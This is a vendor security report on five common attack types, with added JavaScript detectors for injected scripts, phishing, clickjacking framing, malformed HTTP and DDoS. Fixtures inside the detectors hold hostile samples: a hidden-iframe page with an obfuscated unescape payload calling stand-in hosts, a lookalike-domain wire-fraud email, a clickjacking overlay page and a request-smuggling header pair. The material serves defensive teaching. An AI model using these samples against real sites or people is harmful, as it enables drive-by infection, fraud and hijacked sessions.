Cybersecurity Insight

The 5 Most Likely Ways To Be Cyber Attacked

3 Dec

NEOVERA SHORT REPORT

In this report we examine 5 of the most common cyber attack methods. With the growing number of cyber attacks, your best defense is education, awareness, and taking the necessary steps to protect your organization against these threats. Better knowledge means better protection when combined with comprehensive tools to defend your enterprise.

#1: Web-Borne Malware

Malware is part of the event chain in virtually every security incident. Malware, short for malicious software, is an umbrella term that refers to a variety of software that compromises the operation of a system by performing an unauthorized function or process. More specifically, web-borne malware creators use web-browsing add-ons as a medium for distributing malware and unwanted applications. The careless behavior of Internet users combined with targeted campaigns by attackers place companies at higher risk of web malware exposure. The user-centric approach that attackers use for malware distribution proves successful because many Internet users trust add-ons and view them as nonthreatening.

Many applications fail to inspect the data returned from a visit to a website. Attackers, typically using JavaScript, add malicious code to a legitimate webpage, either by compromising the site itself or by abusing a browser add-on that injects content into pages. When an unsuspecting user visits the tampered page, the JavaScript runs in the user's browser and, in most cases, silently downloads malware to the user's PC by exploiting a flaw in the browser or one of its plugins (a "drive-by download").
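The following is an added example, not code from the Neovera report: a heuristic scanner for the injected-script patterns described above (hidden iframes, scripts pulled from hosts the site owner does not control, and inline scripts that decode and execute an escaped payload). The trusted host list, the detection patterns and both sample pages are constructed for illustration.

```javascript
// Added example (not from the Neovera report): a heuristic scanner for the
// injected-script patterns that turn a legitimate page into a drive-by download
// site. Hosts, patterns and the sample pages are constructed for illustration.

// Assumption: hosts the site owner legitimately serves scripts and frames from.
const SITE_BASE = "https://www.example-shop.test/";
const TRUSTED_HOSTS = new Set(["www.example-shop.test", "cdn.example-shop.test"]);

function hostOf(url) {
  try { return new URL(url, SITE_BASE).hostname.toLowerCase(); } catch { return null; }
}

// Value of one attribute in a start tag, or null.
function attr(tag, name) {
  const m = tag.match(new RegExp("\\b" + name + "\\s*=\\s*[\"']?([^\"'\\s>]+)", "i"));
  return m ? m[1] : null;
}

// Returns {kind, evidence} findings for one HTML document.
function scanHtml(html) {
  const findings = [];

  // 1. Frames the user cannot see: the classic way to pull in an exploit page.
  for (const m of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const tag = m[0];
    const w = parseInt(attr(tag, "width"), 10), h = parseInt(attr(tag, "height"), 10);
    const hidden = (w >= 0 && w <= 1) || (h >= 0 && h <= 1) ||
                   /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag);
    if (hidden) findings.push({ kind: "hidden-iframe", evidence: attr(tag, "src") || tag });
  }

  // 2. External scripts loaded from hosts the site owner does not control.
  for (const m of html.matchAll(/<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi)) {
    const host = hostOf(m[1]);
    if (host && !TRUSTED_HOSTS.has(host)) findings.push({ kind: "untrusted-script-src", evidence: m[1] });
  }

  // 3. Inline scripts that decode a hidden payload and hand it to the interpreter,
  //    or that carry long runs of escaped bytes.
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    const body = m[1];
    const decodesAndRuns = /\b(eval|document\.write|setTimeout|Function)\s*\(\s*(unescape|atob|decodeURIComponent)\s*\(/.test(body);
    const longEscapeRun = /(?:%[0-9a-f]{2}|\\x[0-9a-f]{2}){12,}/i.test(body);
    if (decodesAndRuns || longEscapeRun)
      findings.push({ kind: "obfuscated-inline-script", evidence: body.trim().slice(0, 60) });
  }
  return findings;
}

function isLikelyCompromised(html) { return scanHtml(html).length > 0; }

// Constructed sample: a shop page whose footer has been tampered with.
const COMPROMISED_PAGE = `
<html><head><title>Shop</title>
<script src="https://cdn.example-shop.test/app.js"></script>
</head><body>
<h1>Welcome</h1>
<script src="http://stats-collect.invalid/c.js"></script>
<iframe src="http://update-check.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fupdate-check.invalid%2Fgate.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'));</script>
</body></html>`;

// Constructed sample: the same shop page as it should look.
const CLEAN_PAGE = `<html><head><script src="/static/app.js"></script></head>
<body><iframe src="https://www.example-shop.test/help" width="600" height="400"></iframe></body></html>`;
```

Run against a copy of your own pages on a schedule; a new finding on a page that had none yesterday is exactly the change a web-borne malware campaign introduces, and it is visible long before an endpoint alert fires.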

According to the Verizon 2015 Data Breach Investigations Report, five malware events occur every second. The report's "sinister seven" list of the most common malware families includes zbot, rerdom, zeroaccess, andromeda, expiro, asprox, gamarue, and sality.

#2: Spear Phishing

Phishing is the attempt to deceive individuals into providing sensitive information by masquerading as a trustworthy entity in an electronic communication. Spear phishing is phishing aimed at a specific person: an email that appears to come from an individual or business you know but is in fact from criminals after your credit card and bank account numbers, passwords, and the financial information on your PC. The attackers thrive on familiarity and already know a little about you, which makes it easier to trick you into accepting the email as genuine.

Phishing is a favorite tactic of state-sponsored threat actors and criminal organizations alike, used to gain an initial foothold in a network. In state-sponsored attacks the goal of the user interaction is not to extract information directly but to establish a presence on the user's device, set up camp, and continue the intrusion deeper into the network.

Defending against phishing is a numbers game. Even if a company blocks 99.99% of malicious messages, some will still reach an inbox, and one click can compromise the network. According to research from Trend Micro, 91% of cyber attacks, and the resulting data breaches, begin with a spear phishing email.

An effective way to minimize the phishing threat is employee awareness and training, combined with improved detection and response capabilities and multi-factor authentication, so that a phished password alone does not hand over an account. If your organization lacks the in-house expertise to build and maintain controls such as mail filtering and firewalls, consider outsourcing to experts; this can reduce security risk while increasing operational efficiency.
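The following is an added example, not code from the Neovera report: the header and link checks a mail gateway or analyst can apply to catch the familiarity trick described above, namely a sender domain that imitates one of ours, a Reply-To routed elsewhere, and link text that names one host while the link goes to another. The defended domain, the partner list and both sample messages are constructed for illustration.

```javascript
// Added example (not from the Neovera report): header and link checks for the
// tells a spear-phishing email tends to carry. The defended domain, the partner
// list and both sample messages are constructed for illustration.

const OUR_DOMAIN = "example-corp.test";                      // assumption: the defended organisation
const PROTECTED_DOMAINS = [OUR_DOMAIN, "bank-partner.test"]; // assumption: brands worth imitating

// "Display Name <local@domain>" or a bare address -> {name, addr, domain}, or null.
function parseAddress(field) {
  const m = field.match(/^\s*(?:"?([^"<]*?)"?\s*)?<?([^<>\s@]+@([^<>\s]+))>?\s*$/);
  if (!m) return null;
  return { name: (m[1] || "").trim(), addr: m[2].toLowerCase(), domain: m[3].toLowerCase() };
}

// Collapse characters that look alike so "exampIe" (capital I) equals "example".
function skeleton(domain) {
  return domain.toLowerCase().replace(/rn/g, "m").replace(/vv/g, "w")
               .replace(/[1l|]/g, "i").replace(/0/g, "o");
}

// Returns the protected domain that `domain` imitates, or null if it is
// either unrelated or genuinely one of ours (exact match or subdomain).
function lookalikeOf(domain) {
  if (PROTECTED_DOMAINS.some(t => domain === t || domain.endsWith("." + t))) return null;
  for (const t of PROTECTED_DOMAINS) {
    const brand = t.split(".")[0];
    if (skeleton(domain) === skeleton(t) || domain.includes(brand)) return t;
  }
  return null;
}

function hostOfHref(href) {
  try { return new URL(href).hostname.toLowerCase(); } catch { return null; }
}

// msg = { headers: {lowercase-name: value}, body: html string }. Returns indicator strings.
function phishingIndicators(msg) {
  const hits = [];
  const from = parseAddress(msg.headers.from || "");
  if (!from) return ["unparseable-from"];

  const imitated = lookalikeOf(from.domain);
  if (imitated) hits.push(`from-domain-lookalike:${from.domain}~${imitated}`);

  // Display name that itself contains an address from a different domain.
  const embedded = from.name.match(/@([^\s>]+)/);
  if (embedded && embedded[1].toLowerCase() !== from.domain) hits.push("display-name-carries-other-address");

  // Replies silently routed somewhere other than the apparent sender.
  const replyTo = msg.headers["reply-to"] ? parseAddress(msg.headers["reply-to"]) : null;
  if (replyTo && replyTo.domain !== from.domain) hits.push(`reply-to-mismatch:${replyTo.domain}`);

  // Link text that names one host while the href goes to another (or to a lookalike).
  for (const m of msg.body.matchAll(/<a\b[^>]*href\s*=\s*["']([^"']+)["'][^>]*>([\s\S]*?)<\/a>/gi)) {
    const hrefHost = hostOfHref(m[1]);
    if (!hrefHost) continue;
    const shown = m[2].replace(/<[^>]+>/g, "").match(/\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)\b/i);
    if (shown && !hrefHost.endsWith(shown[1].toLowerCase())) hits.push(`link-text-mismatch:${shown[1]}->${hrefHost}`);
    else if (lookalikeOf(hrefHost)) hits.push(`link-lookalike:${hrefHost}`);
  }
  return hits;
}

// Constructed sample: a "CFO" wire request from a lookalike domain (capital I for l).
const SPEAR_PHISH = {
  headers: {
    from: "Jane Doe, CFO <jane.doe@exampIe-corp.test>",
    "reply-to": "accounts@fast-invoice-pay.test",
    subject: "Urgent: wire confirmation needed today",
  },
  body: `<p>Jane here. Please confirm the wire at
         <a href="http://example-corp-secure.test/login">https://portal.example-corp.test/finance</a> before 5pm.</p>`,
};

// Constructed sample: a genuine internal notice.
const LEGIT_MAIL = {
  headers: { from: "IT Helpdesk <helpdesk@mail.example-corp.test>" },
  body: `<p>Reset your password at <a href="https://portal.example-corp.test/reset">the portal</a>.</p>`,
};
```

None of these checks needs the attacker's infrastructure to be known in advance, which is the point: a spear-phishing email is crafted to look familiar, and familiarity is exactly what the lookalike and mismatch tests measure.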

#3: Clickjacking

Clickjacking is a technique that tricks a web user into clicking on something different from what they perceive they are clicking on, potentially revealing confidential information or letting the attacker act in the user's name. A clickjacked page loads the target site in a transparent layer over a decoy page. The user thinks they are clicking the visible buttons but is actually operating controls on the hidden page, which the browser renders with the user's own logged-in session. This endangers both the user and the network, since the attacker can trigger actions that expose confidential information, change credentials, or start a malware download.

For example, an attacker builds a website with a button that says "click here to be entered into a drawing for a free MacBook." On top of that page the attacker loads a transparent iframe containing your webmail, positioned so that its "delete all messages" button sits directly over the "free MacBook" button. You try to click the "free MacBook" button but actually click the invisible "delete all messages" button: the attacker has hijacked your click.

To reduce the risk of clickjacking:

  • For sites you operate, the primary defence is on the server: send a Content-Security-Policy header with a frame-ancestors directive (or the older X-Frame-Options header) so browsers refuse to render your pages inside a frame on another site.
  • Evaluate and install browser extensions such as NoScript and NotScript, which prompt users before allowing JavaScript to run on sites they visit and let them specify trusted domains.
  • Install and maintain a strong email spam filter, and check it often. A clickjacking attack usually begins by luring a user, through email, to a malicious site.
  • Web Application Firewalls (WAFs) can also block attempts to inject code into a site. Though worth it, they are expensive and take time to manage.
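The following is an added example, not code from the Neovera report: the structure of the attack page from the MacBook example beside the response-header check that decides whether a target page can be framed at all. It evaluates CSP frame-ancestors and X-Frame-Options the way a browser does (frame-ancestors governs when both are present). Origins, header values and the decoy page are constructed.

```javascript
// Added example (not from the Neovera report): the page a clickjacker serves,
// next to the response-header check that decides whether a target page can be
// framed at all. Origins, header values and the decoy page are constructed.

// The decoy is what the victim sees; the framed target is invisible (opacity 0)
// but on top (z-index), positioned so its dangerous button covers the decoy button.
const ATTACK_PAGE = `
<style>
  #decoy  { position:absolute; top:220px; left:140px; }
  #target { position:absolute; top:0; left:0; width:900px; height:700px;
            opacity:0; z-index:10; }                 /* invisible, but receives the click */
</style>
<button id="decoy">Click here to be entered into the free MacBook drawing</button>
<iframe id="target" src="https://webmail.example-corp.test/inbox?selectall=1"></iframe>`;

function hostMatches(pattern, host) {
  if (pattern.startsWith("*.")) return host.endsWith(pattern.slice(1)) && host !== pattern.slice(2);
  return host === pattern;
}

// True when a page served from pageOrigin with these response headers may be
// embedded by a document at framerOrigin. Implements CSP frame-ancestors and
// X-Frame-Options; when both are present, frame-ancestors governs.
function canBeFramedBy(headers, pageOrigin, framerOrigin) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, val]) => [k.toLowerCase(), val]));
  const page = new URL(pageOrigin), framer = new URL(framerOrigin);
  const framerPort = framer.port || (framer.protocol === "https:" ? "443" : "80");

  const directive = (h["content-security-policy"] || "").split(";")
    .map(s => s.trim()).find(s => /^frame-ancestors\b/i.test(s));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1).map(s => s.replace(/^'|'$/g, "").toLowerCase());
    return sources.some(src => {
      if (src === "none") return false;
      if (src === "self") return framer.origin === page.origin;
      if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return framer.protocol === src;   // scheme-source, e.g. https:
      const m = src.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:/]+)(?::(\d+|\*))?$/);
      if (!m) return false;
      const [, scheme, host, port] = m;
      if (scheme && framer.protocol !== scheme + ":") return false;
      if (port && port !== "*" && port !== framerPort) return false;
      return hostMatches(host, framer.hostname);
    });
  }

  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return framer.origin === page.origin;
  return true;                                   // no framing protection at all
}

// What the webmail in the example should send. X-Frame-Options is kept for
// browsers that predate CSP Level 2.
const HARDENED_HEADERS = {
  "Content-Security-Policy": "frame-ancestors 'none'",
  "X-Frame-Options": "DENY",
};
```

Point the check at your own login, webmail and admin pages: any page for which it returns true against an arbitrary origin is a clickjacking target regardless of what the user's browser extensions do.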

#4: Zero Day Attacks

A zero-day attack exploits a zero-day vulnerability: a flaw in software or hardware that has not yet been patched or publicly disclosed. An attacker who finds such a flaw can write and deploy an exploit while the vulnerability is still open. The vendor and its customers have had zero days to find and fix the flaw, which gives attackers the advantage and is where the name comes from.

It is hard to protect yourself entirely from zero-day exploits, but some preventive measures help. Keeping firewalls configured to the actual needs of your business and applications is the first step, since an exploit cannot reach a service that is not exposed. The second step is deploying Intrusion Prevention Systems (IPS) that monitor network and system activity; because no signature exists for a zero-day, the value lies in detecting protocol anomalies and unexpected application behaviour rather than known patterns.

Ensure that your IPS includes:

  • Network-level protection
  • Application integrity checking
  • Application-protocol RFC (Request for Comments) conformance validation
  • Content validation and forensics capability
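The following is an added example, not code from the Neovera report: the "RFC conformance validation" item above written out for HTTP/1.1 request heads. A request that breaks the message grammar of RFC 7230 is rejected before any signature is consulted, which is how protocol-anomaly detection stops exploits nobody has a signature for yet. The size limits and the sample requests are constructed.

```javascript
// Added example (not from the Neovera report): the "RFC validation" step of an
// IPS, written out for HTTP/1.1 request heads. A request that breaks the message
// grammar of RFC 7230 is rejected before any signature is consulted, which is how
// protocol-anomaly detection stops exploits nobody has a signature for yet.
// Size limits and the sample requests are constructed.

const MAX_TARGET_LEN = 8000;                          // assumption: local policy
const MAX_HEADER_LINE = 8192;                         // assumption: local policy
const TOKEN = /^[!#$%&'*+.^_`|~0-9A-Za-z-]+$/;       // RFC 7230 "token"
const FIELD_VALUE = /^[\t \x21-\x7e\x80-\xff]*$/;    // printable, no CR/LF/controls

// Returns a list of violations; an empty list means the head is well formed.
function validateRequestHead(raw) {
  const v = [];
  const end = raw.indexOf("\r\n\r\n");
  if (end < 0) return ["no-terminating-crlfcrlf"];
  const head = raw.slice(0, end);
  if (/(^|[^\r])\n|\r(?!\n)/.test(head)) v.push("bare-cr-or-lf");

  const lines = head.split("\r\n");
  const parts = lines[0].split(" ");
  if (parts.length !== 3) v.push("request-line-not-three-parts");
  const [method = "", target = "", version = ""] = parts;
  if (!TOKEN.test(method)) v.push("method-not-token");
  if (!/^HTTP\/1\.[01]$/.test(version)) v.push("bad-http-version");
  if (target.length > MAX_TARGET_LEN) v.push("request-target-too-long");
  if (/\s/.test(target)) v.push("request-target-has-whitespace");
  if (/%(?![0-9A-Fa-f]{2})/.test(target)) v.push("malformed-percent-escape");

  const seen = new Map();
  for (const line of lines.slice(1)) {
    if (line.length > MAX_HEADER_LINE) v.push("header-line-too-long");
    if (/^[ \t]/.test(line)) { v.push("obsolete-line-folding"); continue; }
    const colon = line.indexOf(":");
    if (colon < 1) { v.push("header-without-colon"); continue; }
    const name = line.slice(0, colon), value = line.slice(colon + 1).trim();
    if (!TOKEN.test(name)) v.push("header-name-not-token:" + JSON.stringify(name)); // e.g. "Host " with a space
    if (!FIELD_VALUE.test(value)) v.push("header-value-has-control-chars");
    const key = name.toLowerCase();
    seen.set(key, [...(seen.get(key) || []), value]);
  }

  // Framing headers: the ambiguity that request smuggling relies on.
  const cl = seen.get("content-length") || [];
  if (cl.some(x => !/^\d+$/.test(x))) v.push("content-length-not-numeric");
  if (new Set(cl).size > 1) v.push("conflicting-content-length");
  if (cl.length && seen.has("transfer-encoding")) v.push("content-length-with-transfer-encoding");
  if (version === "HTTP/1.1" && (seen.get("host") || []).length !== 1) v.push("host-header-count-not-one");
  return v;
}

// Constructed samples.
const GOOD_REQ = "GET /index.html HTTP/1.1\r\nHost: www.example-corp.test\r\nUser-Agent: probe/1.0\r\n\r\n";
const SMUGGLE  = "POST /api HTTP/1.1\r\nHost: www.example-corp.test\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n";
const MANGLED  = "GET /a\tb HTTP/1.1\r\nHost : www.example-corp.test\r\nX-Inject: foo\rbar\r\nContent-Length: 12abc\r\n\r\n";
const BARE_LF  = "GET / HTTP/1.1\nHost: www.example-corp.test\n\n";
```

Note what the validator does not need: any knowledge of which product is behind the request or which bug is being aimed at. It only asks whether the message is one a conforming client could have sent, and a surprising share of exploit traffic fails that question.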

#5: DoS and DDoS

Denial of Service (DoS) – A Denial of Service attack is a malicious attempt to make a server or network unavailable to its users, usually by temporarily interrupting or suspending the services of a host connected to the Internet. There are two general forms: attacks that crash a service, for example by sending malformed input it cannot handle, and attacks that flood it with more traffic than it can serve.

Rapid identification and response limit the damage of a DoS attack. Incoming traffic needs to be quickly and reliably identified as malicious rather than as an authentic spike in legitimate demand, for example by looking at how concentrated the traffic is among a few sources or a single request type. Once a DoS attack is confirmed, an effective response usually relies on scalable infrastructure that absorbs the attack until it can be blocked.

Distributed Denial of Service (DDoS) – In a DDoS attack the traffic comes from more than one source, often thousands of unique IP addresses, which makes it harder to filter the attack and to pinpoint its origin. The flood of incoming requests overwhelms the target system, denying service to legitimate users.

A targeted DDoS attack is very hard to prevent outright, but precautions can limit the damage. To understand how your organization would react, conduct regular drills and exercises to identify weak points, and consider adding technology or external mitigation services to help maintain or restore service.

Using a cloud-based mitigation provider is useful: such providers have built out large amounts of network bandwidth and DDoS scrubbing capacity at multiple sites, so they can absorb volumes of traffic far beyond what a single data center could. They filter the traffic for you and forward only "clean" traffic to your data center.

DDoS attacks can be divided into three main categories:

  1. Volume-based attacks – The goal is to saturate the bandwidth of the attacked site. Measured in bits per second (bps).
  2. Protocol attacks – These consume the connection state and processing capacity of servers and intermediate devices such as firewalls and load balancers; a SYN flood is the classic example. Measured in packets per second (pps).
  3. Application-layer attacks – These look like legitimate, innocent requests but target the application itself, aiming to exhaust or crash the web server. Measured in requests per second (rps).
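The following is an added example, not code from the Neovera report: it measures a one-second traffic window in the three units listed above (bps, pps, rps) and applies the distinction the earlier paragraph calls for, telling an attack spike from an authentic crowd by how concentrated the traffic is. Baselines, the spike threshold and the four traffic scenarios are constructed for illustration.

```javascript
// Added example (not from the Neovera report): measuring a one-second traffic
// window in the report's three units (bps, pps, rps) and deciding whether a spike
// looks like an attack or like a legitimate crowd. Baselines, thresholds and the
// four traffic scenarios are constructed for illustration.

// Assumption: normal peak for this site, learned from history.
const BASELINE = { bps: 50e6, pps: 20e3, rps: 500 };
const SPIKE_FACTOR = 10;                 // assumption: 10x baseline counts as a spike

// One record per source per second: bytes, packets, HTTP requests and the
// path that source hit most (null when it sent no requests).
function measure(samples) {
  const sum = (k) => samples.reduce((s, x) => s + x[k], 0);
  const bytes = sum("bytes"), pkts = sum("pkts"), reqs = sum("reqs");
  const top10 = [...samples].sort((a, b) => b.reqs - a.reqs).slice(0, 10);
  return {
    bps: bytes * 8, pps: pkts, rps: reqs,              // window is one second
    sources: new Set(samples.map(x => x.src)).size,
    bytesPerPkt: pkts ? bytes / pkts : 0,
    topShare: reqs ? top10.reduce((s, x) => s + x.reqs, 0) / reqs : 0,
    distinctPaths: new Set(samples.filter(x => x.reqs > 0).map(x => x.path)).size,
  };
}

function classify(samples) {
  const m = measure(samples), attacks = [];
  if (m.bps > SPIKE_FACTOR * BASELINE.bps) attacks.push("volume-based");
  if (m.pps > SPIKE_FACTOR * BASELINE.pps && m.bytesPerPkt < 100) attacks.push("protocol");
  let legitimateSpike = false;
  if (m.rps > SPIKE_FACTOR * BASELINE.rps) {
    // A real crowd is spread over many sources and many pages; a flood is
    // concentrated in a few sources or hammers one endpoint.
    if (m.topShare > 0.5 || m.distinctPaths <= 3) attacks.push("application-layer");
    else legitimateSpike = true;
  }
  return { metrics: m, attacks, legitimateSpike };
}

// Scenario builders (constructed data): n sources, one record each.
function scenario(n, f) {
  return Array.from({ length: n }, (_, i) =>
    ({ src: `10.${(i >> 16) & 255}.${(i >> 8) & 255}.${i & 255}`, ...f(i) }));
}
const flashCrowd    = () => scenario(8000,  i  => ({ bytes: 6000,  pkts: 10,  reqs: 1,  path: "/news/" + (i % 40) }));
const httpFlood     = () => scenario(300,   () => ({ bytes: 32000, pkts: 240, reqs: 40, path: "/search?q=a" }));
const synFlood      = () => scenario(20000, () => ({ bytes: 1200,  pkts: 20,  reqs: 0,  path: null }));
const amplification = () => scenario(2000,  () => ({ bytes: 80000, pkts: 60,  reqs: 0,  path: null }));
```

The HTTP flood scenario is the instructive one: it comes from hundreds of sources and carries modest bandwidth, so neither source count nor bits per second gives it away; only the fact that every request lands on one endpoint does. That is the check a response team needs before deciding to absorb, rate-limit or hand traffic to a scrubbing provider.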

As the volume and sophistication of attack methods and data breaches increase, the question is not if but when. According to the US Chamber of Commerce, one in five small businesses falls victim to hackers every year, and of those, about 60 percent go out of business within six months of the attack. Don't wait until you're a victim of a cyber attack. Take action now to protect your critical data.

For more information on cyber security monitoring, and to learn how Neovera can help you stay ahead of security threats, visit us at www.neovera.com/cybersecurity or contact us at sales@neovera.com. We provide continuous monitoring, enhanced intelligence, proactive prevention, early threat recognition, rapid response, and investigation of root causes to keep your enterprise safe.